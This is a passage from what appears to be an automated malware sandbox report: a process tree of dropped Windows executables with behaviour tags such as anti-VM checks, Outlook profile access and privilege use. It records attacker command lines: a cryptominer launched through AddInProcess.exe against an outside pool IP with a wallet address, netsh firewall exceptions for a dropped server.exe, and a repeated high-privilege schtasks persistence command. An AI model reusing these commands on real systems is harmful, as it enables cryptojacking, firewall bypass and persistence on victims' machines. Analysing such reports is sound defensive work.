        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
        5⤵
        
        PID:5124
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
        5⤵
        
        PID:5640
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3060 /prefetch:2
        5⤵
        
        PID:616
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2512 /prefetch:2
        5⤵
        
        PID:6292
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3892 /prefetch:2
        5⤵
        
        PID:4284
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4712 /prefetch:2
        5⤵
        
        PID:5204
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4604 /prefetch:2
        5⤵
        
        PID:3088
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3928 /prefetch:2
        5⤵
        
        PID:5756
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4372
  - - C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      System Location Discovery: System Language Discovery
      PID:2892
  - - C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe"
      4⤵
      Executes dropped EXE
      PID:4188
  - - C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe"
      4⤵
      Executes dropped EXE
      PID:2880
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3664
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:6036
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\xblkpfZ8Y4.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\xblkpfZ8Y4.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:6148
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test28.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test28.exe"
    3⤵
    - Executes dropped EXE
    PID:6024
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test27.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test27.exe"
    3⤵
    - Executes dropped EXE
    PID:7152
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Drops startup file
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3556
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:4460
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 85.31.47.143:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=50
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6092
- C:\Users\Admin\Desktop\4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:6172
- - C:\Users\Admin\Desktop\Files\trojan.exe
    "C:\Users\Admin\Desktop\Files\trojan.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6728
  - - C:\Users\Admin\AppData\Roaming\server.exe
      "C:\Users\Admin\AppData\Roaming\server.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2172
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1204
- - C:\Users\Admin\Desktop\Files\cbchr.exe
    "C:\Users\Admin\Desktop\Files\cbchr.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2428
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:4980
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 1076
      4⤵
      Program crash
      PID:4112
- C:\Users\Admin\Desktop\Files\trojan.exe
  "C:\Users\Admin\Desktop\Files\trojan.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5428
- - C:\Users\Admin\AppData\Roaming\server.exe
    "C:\Users\Admin\AppData\Roaming\server.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Drops autorun.inf file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    PID:5632
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:3612
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:1892
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:6276
- C:\Users\Admin\Desktop\Files\cbchr.exe
  "C:\Users\Admin\Desktop\Files\cbchr.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:2640
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:6252
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 1080
    3⤵
    - Program crash
    PID:5972
- C:\Users\Admin\Desktop\New Text Document mod.exse\a\test24.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test24.exe"
  2⤵
  - Executes dropped EXE
  PID:312
- C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID:5588
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 1484
    3⤵
    - Program crash
    PID:2076
- C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID:4892
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1420
    3⤵
    - Program crash
    PID:6320
- C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:5760
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6728
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:2908
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6324
- C:\Users\Admin\Desktop\4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:6424
- - C:\Users\Admin\Desktop\Files\Server.exe
    "C:\Users\Admin\Desktop\Files\Server.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    PID:6436
- - C:\Users\Admin\Desktop\Files\bp.exe
    "C:\Users\Admin\Desktop\Files\bp.exe"
    3⤵
    - Executes dropped EXE
    PID:6692
- - C:\Users\Admin\Desktop\Files\Amogus.exe
    "C:\Users\Admin\Desktop\Files\Amogus.exe"
    3⤵
    - Executes dropped EXE
    PID:4668
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7060
  - - C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:6384
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5616
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S2T8WQS2yxLf.bat" "
        5⤵
        
        PID:5352
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:4400
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1796
      - C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4584
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\99U8QtrO6bD7.bat" "
        7⤵
        
        PID:524
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:4928
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:212
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        8⤵
        
        PID:4920
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BDlw73GtA2wr.bat" "
        9⤵
        
        PID:3444
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:2052
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5656
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        10⤵
        
        PID:5428
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Gqq2FjT599Bm.bat" "
        11⤵
        
        PID:4128
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:220
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6208
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        12⤵
        
        PID:3040
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PNZmUfdpNgti.bat" "
        13⤵
        
        PID:5600
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:6164
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5228
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        14⤵
        
        PID:3916
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vVhFz4igzp4I.bat" "
        15⤵
        
        PID:4036
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:5184
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5772
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        16⤵
        
        PID:3976
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tlN56etBHpUs.bat" "
        17⤵
        
        PID:2544
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:4956
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5648
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        18⤵
        
        PID:6516
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hvrx5HKfNBFN.bat" "
        19⤵
        
        PID:6968
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:4904
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4884
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        20⤵
        
        PID:5268
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3s3iEf8XA0j9.bat" "
        21⤵
        
        PID:3260
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:4736
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5648
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        22⤵
        
        PID:5828
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        23⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xacdcxFjArbt.bat" "
        23⤵
        
        PID:1016
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:5780
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3700
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        24⤵
        
        PID:2076
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        25⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iHlwe65gl8NG.bat" "
        25⤵
        
        PID:5512
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:2724
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4756
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        26⤵
        
        PID:1428
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        27⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dWlbEyCYrSDP.bat" "
        27⤵
        
        PID:4976
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:6876
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2540
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        28⤵
        
        PID:392
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        29⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ueh2KWisYlOU.bat" "
        29⤵
        
        PID:524
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        30⤵
        
        PID:1376
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2240
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        30⤵
        
        PID:3444
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        31⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rVaoKWTZE25t.bat" "
